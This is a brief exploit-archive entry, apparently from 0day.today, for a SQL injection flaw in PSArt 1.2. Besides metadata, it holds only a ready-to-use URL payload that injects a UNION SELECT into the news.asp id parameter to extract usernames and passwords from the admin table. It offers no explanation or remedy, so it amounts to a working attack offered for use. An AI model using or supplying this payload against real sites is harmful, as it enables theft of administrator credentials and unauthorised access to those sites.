id: 9960
date: 10/30/2009
title: PSArt 1.2 SQL Injection Vulnerability
author: Securitylab
cves: 

=====================================
PSArt 1.2 SQL Injection Vulnerability
=====================================

#################################################################
# Application Info:
# Name: PSArt
# Version: 1.2
#################################################################
# Discoverd By: Securitylab
#################################################################
# http://site.com/kxfzg/news.asp?id=128%20and%201=2%20union%20select%201,username,3,4,5,6,7,password,9%20from%20admin
#===========================================================
#################################################################



#  0day.today [2023-03-25]  #